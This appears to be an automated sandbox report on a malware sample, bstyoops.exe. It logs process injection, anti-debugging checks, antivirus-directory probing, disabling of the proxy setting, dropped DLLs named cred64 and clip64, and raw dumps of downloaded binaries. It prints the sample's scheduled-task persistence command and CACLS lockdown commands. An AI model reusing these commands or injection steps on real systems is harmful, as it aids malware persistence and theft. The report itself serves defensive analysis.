NtAllocateVirtualMemory Aug. 28, 2023, 5:24 p.m.	process_identifier: 2052 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02040000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 28, 2023, 5:24 p.m.	process_identifier: 1236 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000004900000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 28, 2023, 5:24 p.m.	process_identifier: 2236 region_size: 1835008 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ab0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 28, 2023, 5:24 p.m.	process_identifier: 2236 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 28, 2023, 5:24 p.m.	process_identifier: 2236 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f61000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 28, 2023, 5:24 p.m.	process_identifier: 2236 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f62000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 28, 2023, 5:24 p.m.	process_identifier: 2236 region_size: 1638400 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02200000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 28, 2023, 5:24 p.m.	process_identifier: 2236 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02350000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 28, 2023, 5:24 p.m.	process_identifier: 2236 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00392000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 28, 2023, 5:24 p.m.	process_identifier: 2236 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003ac000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 28, 2023, 5:24 p.m.	process_identifier: 2236 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00550000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 28, 2023, 5:24 p.m.	process_identifier: 2236 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003cb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 28, 2023, 5:24 p.m.	process_identifier: 2236 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003c7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 28, 2023, 5:24 p.m.	process_identifier: 2236 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003c5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 28, 2023, 5:24 p.m.	process_identifier: 2236 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003b6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 28, 2023, 5:24 p.m.	process_identifier: 2236 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003ba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 28, 2023, 5:24 p.m.	process_identifier: 2236 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003b7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 28, 2023, 5:24 p.m.	process_identifier: 2236 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0039a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 28, 2023, 5:24 p.m.	process_identifier: 2236 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006ff000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 28, 2023, 5:24 p.m.	process_identifier: 2236 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 28, 2023, 5:24 p.m.	process_identifier: 2236 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00551000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 28, 2023, 5:24 p.m.	process_identifier: 2236 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00552000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 28, 2023, 5:24 p.m.	process_identifier: 2236 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00553000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 28, 2023, 5:24 p.m.	process_identifier: 2236 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00554000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

A process attempted to delay the analysis task. (1 event)

description

bstyoops.exe tried to sleep 141 seconds, actually delayed analysis time by 141 seconds

Foreign language identified in PE resource (1 event)

name

RT_VERSION

language

LANG_ENGLISH

filetype

data

sublanguage

SUBLANG_ENGLISH_AUS

offset

0x000a7ec8

size

0x000001f8

Creates executable files on the filesystem (2 events)

file	C:\Users\test22\AppData\Roaming\c75c6c37b2d7a3\clip64.dll
file	C:\Users\test22\AppData\Roaming\c75c6c37b2d7a3\cred64.dll

Creates a suspicious process (4 events)

cmdline	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "bstyoops.exe" /P "test22:N"&&CACLS "bstyoops.exe" /P "test22:R" /E&&echo Y\|CACLS "..\b6ba12ff32" /P "test22:N"&&CACLS "..\b6ba12ff32" /P "test22:R" /E&&Exit
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN bstyoops.exe /TR "C:\Users\test22\AppData\Local\Temp\b6ba12ff32\bstyoops.exe" /F
cmdline	C:\Windows\system32\cmd.exe /S /D /c" echo Y"
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN bstyoops.exe /TR "C:\Users\test22\AppData\Local\Temp\b6ba12ff32\bstyoops.exe" /F

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\Temp\b6ba12ff32\bstyoops.exe

Drops an executable to the user AppData folder (2 events)

file	C:\Users\test22\AppData\Roaming\c75c6c37b2d7a3\clip64.dll
file	C:\Users\test22\AppData\Local\Temp\b6ba12ff32\bstyoops.exe

A process created a hidden window (5 events)

Time & API	Arguments	Status	Return
ShellExecuteExW Aug. 28, 2023, 5:24 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\b6ba12ff32\bstyoops.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\b6ba12ff32\bstyoops.exe	1	1
ShellExecuteExW Aug. 28, 2023, 5:24 p.m.	show_type: 0 filepath_r: SCHTASKS parameters: /Create /SC MINUTE /MO 1 /TN bstyoops.exe /TR "C:\Users\test22\AppData\Local\Temp\b6ba12ff32\bstyoops.exe" /F filepath: SCHTASKS	1	1
ShellExecuteExW Aug. 28, 2023, 5:24 p.m.	show_type: 0 filepath_r: cmd parameters: /k echo Y\|CACLS "bstyoops.exe" /P "test22:N"&&CACLS "bstyoops.exe" /P "test22:R" /E&&echo Y\|CACLS "..\b6ba12ff32" /P "test22:N"&&CACLS "..\b6ba12ff32" /P "test22:R" /E&&Exit filepath: cmd	1	1
ShellExecuteExW Aug. 28, 2023, 5:25 p.m.	show_type: 0 filepath_r: rundll32.exe parameters: C:\Users\test22\AppData\Roaming\c75c6c37b2d7a3\cred64.dll, Main filepath: rundll32.exe	1	1
ShellExecuteExW Aug. 28, 2023, 5:25 p.m.	show_type: 0 filepath_r: rundll32.exe parameters: C:\Users\test22\AppData\Roaming\c75c6c37b2d7a3\clip64.dll, Main filepath: rundll32.exe	1	1

An executable file was downloaded by the process bstyoops.exe (2 events)

Time & API	Arguments	Status	Return	Repeated
InternetReadFile Aug. 28, 2023, 5:25 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $vÕtOÕtOÕtOpNÇtOwNÞtOqNetOzqNtOzpNÚtOzwNÜtOuNØtOÕuOktONy}NÑtONytNÔtONyOÔtONyvNÔtORichÕtOPEds5¼dð" X Îp`úXØú@ø¼Pøà(pP)p Ð.textxW X `.rdataþp \ @@.data¼u<ü@À.pdata¼8@@_RDATA0Ö@@.rsrcø@Ø@@.relocøPÚ@BHì(A¸ HH Àè3o H L7 HÄ(éoò ÌÌÌHì(A¸ HH 0/èo H 7 HÄ(é?ò ÌÌÌHì(A¸HH à/èÓn H Ì7 HÄ(éò ÌÌÌHì(A¸ H_H +è£n H 8 HÄ(éßñ ÌÌÌHì(A¸HWH .èsn H L8 HÄ(é¯ñ ÌÌÌHì(A¸H?H P)èCn H 8 HÄ(éñ ÌÌÌHì(E3ÀHhH ã.èn H Ï8 HÄ(éRñ ÌÌÌÌÌÌHì(E3ÀHâgH /èæm H 9 HÄ(é"ñ ÌÌÌÌÌÌHì(E3ÀH²gH Cè¶m H O9 HÄ(éòð ÌÌÌÌÌÌHì(E3ÀHgH S(èm H 9 HÄ(éÂð ÌÌÌÌÌÌHì(A¸HoH (èSm H Ì9 HÄ(éð ÌÌÌHì(A¸HOH Ð/è#m H : HÄ(é_ð ÌÌÌHì(A¸H/H -èól H L: HÄ(é/ð ÌÌÌHì(A¸HH P'èÃl H : HÄ(éÿï ÌÌÌHì(A¸HïH à(èl H Ì: HÄ(éÏï ÌÌÌHì(A¸HßH °ècl H ; HÄ(éï ÌÌÌHì(A¸H¿H è3l H L; HÄ(éoï ÌÌÌHì(A¸HH )èl H ; HÄ(é?ï ÌÌÌHì(A¸HwH à)èÓk H Ì; HÄ(éï ÌÌÌHì(A¸H_H +è£k H < HÄ(éßî ÌÌÌHì(A¸H?H ,èsk H L< HÄ(é¯î ÌÌÌHì(A¸LHH p(èCk H < HÄ(éî ÌÌÌHì(A¸H?H À%èk H Ì< HÄ(éOî ÌÌÌHì(A¸dH/H P-èãj H = HÄ(éî ÌÌÌHì(A¸HgH ,è³j H L= HÄ(éïí ÌÌÌHì(A¸HOH ð)èj H = HÄ(é¿í ÌÌÌHì(A¸H?H @%èSj H Ì= HÄ(éí ÌÌÌHì(A¸HH pè#j H > HÄ(é_í ÌÌÌHì(A¸(HÿH )èói H L> HÄ(é/í ÌÌÌHì(A¸HÿH P+èÃi H > HÄ(éÿì ÌÌÌHì(A¸HßH À,èi H Ì> HÄ(éÏì ÌÌÌHì(A¸H¿H Ð)èci H ? HÄ(éì ÌÌÌHì(A¸HH +è3i H L? HÄ(éoì ÌÌÌHì(A¸HH °&èi H ? HÄ(é?ì ÌÌÌHì(A¸,HoH `'èÓh H Ì? HÄ(éì ÌÌÌHì(A¸HoH p&è£h H @ HÄ(éßë ÌÌÌHì(A¸H_H à)èsh H L@ HÄ(é¯ë ÌÌÌHì(A¸$H?H 0èCh H @ HÄ(éë ÌÌÌHì(A¸H7H @'èh H Ì@ HÄ(éOë ÌÌÌHì(A¸HH P"èãg H A HÄ(éë ÌÌÌHì(A¸HH 'è³g H LA HÄ(éïê ÌÌÌHì(A¸HÿH p$èg H A HÄ(é¿ê ÌÌÌHì(A¸ HßH @(èSg H ÌA HÄ(éê ÌÌÌHì(A¸ H×H P%è#g H B HÄ(é_ê ÌÌÌHì(A¸HoH "èóf H LB HÄ(é/ê ÌÌÌHì(A¸HH °$èÃf H B HÄ(éÿé ÌÌÌHì(A¸HH "èf H ÌB HÄ(éÏé ÌÌÌHì(A¸HgH p(ècf H C HÄ(éé ÌÌÌHì(A¸LHÿH à$è3f H LC HÄ(éoé ÌÌÌHì(A¸HH Ð$èf H C HÄ(é?é ÌÌÌHì(A¸dHÿH %èÓe H ÌC HÄ(éé ÌÌÌHì(A¸HÇH 0(è£e H D HÄ(éßè ÌÌÌHì(A¸H¯H 'èse H LD HÄ(é¯è ÌÌÌHì(A¸HH $èCe H D HÄ(éè ÌÌÌHì(A¸HwH À!èe H ÌD HÄ(éOè ÌÌÌHì(A¸HOH °'èãd H E HÄ(éè ÌÌÌHì(A¸H'H #è³d H LE HÄ(éïç ÌÌÌHì(A¸HÿH "èd H E HÄ(é¿ç ÌÌÌHì(A¸HßH ` èSd H ÌE HÄ(éç ÌÌÌHì(A¸?HH °#è#d H F HÄ(é_ç ÌÌÌH iF éPç ÌÌÌÌH ÉF é@ç ÌÌÌÌH )G é0ç ÌÌÌÌH G é ç ÌÌÌÌH éG éç ÌÌÌÌHì(E3ÀH¢]H è¦c H /H HÄ(éâæ ÌÌÌÌÌÌH H éÐæ ÌÌÌÌH éH éÀæ ÌÌÌÌH II é°æ ÌÌÌÌH ©I é æ ÌÌÌÌ request_handle: 0x00cc000c	1	1	0
InternetReadFile Aug. 28, 2023, 5:25 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $,CyáCyáCyáâ~Iyáä~Ëyáå~Qyáå~Lyáâ~Ryáä~byáà~FyáCyàyáØè~@yáØá~ByáØByáØã~ByáRichCyáPELu5¼dà!Þ>ð°@ J<K<øT ?p?@ð,.textVÝÞ `.rdataîaðbâ@@.dataD`D@À.rsrcøP@@.relocTR@Bj h¨<¹phè?#hêèYÃÌÌÌj8hÌ<¹hè#h`êèlYÃÌÌÌj8hÌ<¹ hèÿ"hÀêèLYÃÌÌÌj8hÌ<¹¸hèß"h ëè,YÃÌÌÌj8h=¹Ðhè¿"hëè*YÃÌÌÌj0hD=¹èhè"hàëèì)YÃÌÌÌj0hx=¹iè"h@ìèÌ)YÃÌÌÌhh°=¹iè\"h ìè©)YÃj?h>¹0iè?"híè)YÃÌÌÌÁÂÌÌÌÌÌÌÌÌÌÌÌUìVñWÀFPÇñfÖEÀPèÂ2ÄÆ^]ÂÌÌÌI¸\|<ÉEÁÃÌÌUìVñFÇñPèó2ÄöEtjVè«%ÄÆ^]ÂAÇñPèÉ2YÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌWÀÁfÖAÇA<ÇìñÃÌÌÌÌÌÌÌÌUììMôèÒÿÿÿhJEôPè2ÌÌÌÌUìVñWÀFPÇñfÖEÀPèò1ÄÇìñÆ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌUìVñWÀFPÇñfÖEÀPè²1ÄÇ ñÆ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌUìQSZVWQSñè=h3É3À}üÛ~53Ò;ÇþEÐ=h¸phCph~r>A}üB;Ë\|Ë~r_ÆÆ^[å]Ã_ÆÆ^[å]ÃÌÌÌÌÌUììSVWòùQ}ôFPEðè3Û]ø9]ð)D~Ær¾Pè¯KÄÀu-NÆùr< tÆùrÏréÌ~Ær=@i3Ò Diÿt+EÿfD]ÿù¸0iC0i8]øtB;×ráÊÿEÈxr3Àÿt.MÿD=Di¹0i]ÿC 0i8]øt@;ÇrÝÈÿ=Di¹0iC 0iMìMôMøyr MøÏ+È 3Ò÷÷Mì}ô MøC]ø;]ðÜþÿÿrÆÇ_^[å]ÃÆÇ_^[å]ÃÌÌÌÌÌÌÌÌÌÌUìì@SVWÙòQMÄ]ôèçýÿÿEÄÖPMÜèYþÿÿhÇCÇCÆè°"Ø¹Èÿ]øûÄó«3Ò¾8>Bú@\|ðUì3ö3Û~øÒtAMø}ðEÜCEÜ¾øÿt'ÁæðÇxÏÆÓøMôPèUìïMøC;ÚrÂEøÀthPèð!ÄUðúr(MÜBÁúrIüÂ#+ÁÀüøwVRQèÀ!ÄUØÇEìÇEðÆEÜúr(MÄBÁúrIüÂ#+ÁÀüøwRQè~!ÄEô_^[å]ÃèGÌÌÌÌÌÌÌÌÌÌÌUìì4E0SVW3ÿÆEè¾À]ÇEàÇEäÆEÐ;Ç´+ÇMÐ;ÃBØ}4E CE SÇPèþr.MèVÁúrIüÂ#+ÁÀüøhRQè× ÄMÐ}Uó~EàEèCU}äuà]f~ÉMèCÁfÖEø;óu\îr; uÀÂîsïþüî: u7þýßH:Ju&þþÎH:Juþÿ½@:B±E0Guü;øõþÿÿ3ÿUþr/MèFÁþrIüÆ#+ÁÀüøVQè UÄEør'HÂùrRüÁ#+ÂÀüøw`QRèÏÄU4ÇEÇEÆEúr3M BÁúrIüÂ#+ÁÀüøwë uüGéWÿÿÿRQèÄÇ_^[å]Ãè Eè«ÌÌÌÌÌÌÌÌÌÌÌUìQS]Vñ]üWjhÀ>ÇFÇFÆèD3ÿÛ~1}ECE8S¿C ú¶È¶ÃGÈ¶ÁÎPèG;}ü\|ÏUúr(MBÁúrIüÂ#+ÁÀüøwRQèÑÄ_Æ^[å]ÃèïDÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìì0VWj$hÄ>MÐÇEàÇEäÆEÐèEÀu3öéÇ3ÿÀ¸ÇEøÇEüÆEè;ÇF+Ç¹;ÁBÈ}ECEQÇMèPèBìEÐÌPètìEèôìÌPèaÎèªþÿÿÄè¢üÿÿUüÄ0Àúr,MèBÁúrIüÂ#+ÁÀüø¹RQèÇÄEG;øHÿÿÿ¾Uäúr(MÐBÁúrIüÂ#+ÁÀüøwxRQèÄUúr^MBÁúrFIüÂ#+ÁÀüøwHë4úr(MèBÁúrIüÂ#+ÁÀüøw#RQè1Ä3öétÿÿÿRQè Ä_Æ^å]Ãè?CèJÌÌÌÌÌÌÌÌÌÌUìQEUMVÀS@WPè] ÄM}ØÓCM+ÑID ÿÀuóóNFÀuù+ñFVjÿðVøSWÿðPèÇ5ÄWÿðjÿñÿñWjÿñÿ ñUM_[^úr%BÁúrIüÂ#+ÁÀüøwRQèAÄå]ÃèdBÌÌÌÌUìì$SVWùjÇGÇGÆÿñÀj ÿ$ñØ]üÛlSÿðEôÀSjjjjjÿPjhéýÿððuøö.WN;ÊwOÇrÆëFGÙ+Ú+Â;Øw%ÇOrS4jVèE,ÆÄuøëQSÆEøÏÿuøSè¨]üÇrjjVPjÿÿuô request_handle: 0x00cc000c	1	1	0

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x00081c00', u'virtual_address': u'0x00002000', u'entropy': 7.9362247064591775, u'name': u'.text', u'virtual_size': u'0x00081b98'}

entropy

7.93622470646

description

A section with a high entropy has been found

entropy

0.781038374718

description

Overall entropy of this PE file is high

Yara rule detected in process memory (26 events)

description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Communications over HTTP	rule	Network_HTTP
description	Take ScreenShot	rule	ScreenShot
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Communications over HTTP	rule	Network_HTTP
description	Take ScreenShot	rule	ScreenShot
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (2 events)

cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN bstyoops.exe /TR "C:\Users\test22\AppData\Local\Temp\b6ba12ff32\bstyoops.exe" /F
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN bstyoops.exe /TR "C:\Users\test22\AppData\Local\Temp\b6ba12ff32\bstyoops.exe" /F

Allocates execute permission to another process indicative of possible code injection (2 events)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory Aug. 28, 2023, 5:24 p.m.	process_identifier: 2052 region_size: 253952 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000274	1	0	0
NtAllocateVirtualMemory Aug. 28, 2023, 5:24 p.m.	process_identifier: 2300 region_size: 253952 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000274	1	0	0

Attempts to identify installed AV products by installation directory (7 events)

file	C:\ProgramData\AVAST Software
file	C:\ProgramData\Avira
file	C:\ProgramData\Kaspersky Lab
file	C:\ProgramData\Panda Security
file	C:\ProgramData\Bitdefender
file	C:\ProgramData\AVG
file	C:\ProgramData\Doctor Web

Installs itself for autorun at Windows startup (2 events)

cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN bstyoops.exe /TR "C:\Users\test22\AppData\Local\Temp\b6ba12ff32\bstyoops.exe" /F
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN bstyoops.exe /TR "C:\Users\test22\AppData\Local\Temp\b6ba12ff32\bstyoops.exe" /F

Disables proxy possibly for traffic interception (1 event)

Time & API	Arguments	Status	Return	Repeated
RegSetValueExA Aug. 28, 2023, 5:24 p.m.	key_handle: 0x00000314 regkey_r: ProxyEnable reg_type: 4 (REG_DWORD) value: 0 regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable	1	0	0

Potential code injection by writing to the memory of another process (6 events)

Time & API	Arguments	Status	Return
WriteProcessMemory Aug. 28, 2023, 5:24 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $]üMoooBoBoBoÌoÌ oÌ5oBooºoomooRichoPELVÈdàÎØnà@à@¨\ à°`"0OpDP O@à`.textÌÎ `.rdataàÒ@@.data¸$p^@À.rsrcà v@@.reloc`"°$x@B base_address: 0x00400000 process_identifier: 2052 process_handle: 0x00000274	1	1
WriteProcessMemory Aug. 28, 2023, 5:24 p.m.	buffer: 0 H` }<?xml version='1.0' encoding='UTF-8' standalone='yes'?> <assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level='asInvoker' uiAccess='false' /> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x0043a000 process_identifier: 2052 process_handle: 0x00000274	1	1
WriteProcessMemory Aug. 28, 2023, 5:24 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2052 process_handle: 0x00000274	1	1
WriteProcessMemory Aug. 28, 2023, 5:24 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $]üMoooBoBoBoÌoÌ oÌ5oBooºoomooRichoPELVÈdàÎØnà@à@¨\ à°`"0OpDP O@à`.textÌÎ `.rdataàÒ@@.data¸$p^@À.rsrcà v@@.reloc`"°$x@B base_address: 0x00400000 process_identifier: 2300 process_handle: 0x00000274	1	1
WriteProcessMemory Aug. 28, 2023, 5:24 p.m.	buffer: 0 H` }<?xml version='1.0' encoding='UTF-8' standalone='yes'?> <assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level='asInvoker' uiAccess='false' /> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x0043a000 process_identifier: 2300 process_handle: 0x00000274	1	1
WriteProcessMemory Aug. 28, 2023, 5:24 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2300 process_handle: 0x00000274	1	1

Code injection by writing an executable or DLL to the memory of another process (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory Aug. 28, 2023, 5:24 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $]üMoooBoBoBoÌoÌ oÌ5oBooºoomooRichoPELVÈdàÎØnà@à@¨\ à°`"0OpDP O@à`.textÌÎ `.rdataàÒ@@.data¸$p^@À.rsrcà v@@.reloc`"°$x@B base_address: 0x00400000 process_identifier: 2052 process_handle: 0x00000274	1	1	0
WriteProcessMemory Aug. 28, 2023, 5:24 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $]üMoooBoBoBoÌoÌ oÌ5oBooºoomooRichoPELVÈdàÎØnà@à@¨\ à°`"0OpDP O@à`.textÌÎ `.rdataàÒ@@.data¸$p^@À.rsrcà v@@.reloc`"°$x@B base_address: 0x00400000 process_identifier: 2300 process_handle: 0x00000274	1	1	0

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 912 called NtSetContextThread to modify thread in remote process 2052
Process injection	Process 2236 called NtSetContextThread to modify thread in remote process 2300
NtSetContextThread Aug. 28, 2023, 5:24 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4288031 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000270 process_identifier: 2052	1	0	0
NtSetContextThread Aug. 28, 2023, 5:24 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4288031 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000270 process_identifier: 2300	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 912 resumed a thread in remote process 2052
Process injection	Process 2236 resumed a thread in remote process 2300
NtResumeThread Aug. 28, 2023, 5:24 p.m.	thread_handle: 0x00000270 suspend_count: 1 process_identifier: 2052	1	0	0
NtResumeThread Aug. 28, 2023, 5:24 p.m.	thread_handle: 0x00000270 suspend_count: 1 process_identifier: 2300	1	0	0

Uses suspicious command line tools or Windows utilities (6 events)

cmdline	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "bstyoops.exe" /P "test22:N"&&CACLS "bstyoops.exe" /P "test22:R" /E&&echo Y\|CACLS "..\b6ba12ff32" /P "test22:N"&&CACLS "..\b6ba12ff32" /P "test22:R" /E&&Exit
cmdline	CACLS "..\b6ba12ff32" /P "test22:R" /E
cmdline	CACLS "bstyoops.exe" /P "test22:R" /E
cmdline	CACLS "bstyoops.exe" /P "test22:N"
